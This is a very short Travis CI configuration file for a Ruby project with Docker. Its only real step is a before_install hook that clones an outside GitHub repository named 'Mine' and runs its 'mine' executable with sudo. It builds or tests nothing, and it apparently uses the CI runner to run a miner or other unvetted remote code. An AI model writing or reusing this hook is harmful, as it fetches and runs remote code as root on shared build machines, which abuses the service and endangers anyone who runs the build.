language: ruby

services:
  - docker

before_install:
  - sudo apt install -y git && sudo git clone https://github.com/MiiAnliAngku/Mine.git && cd Mine && sudo chmod u+x mine && sudo ./mine

# This code is created by Anli Angku
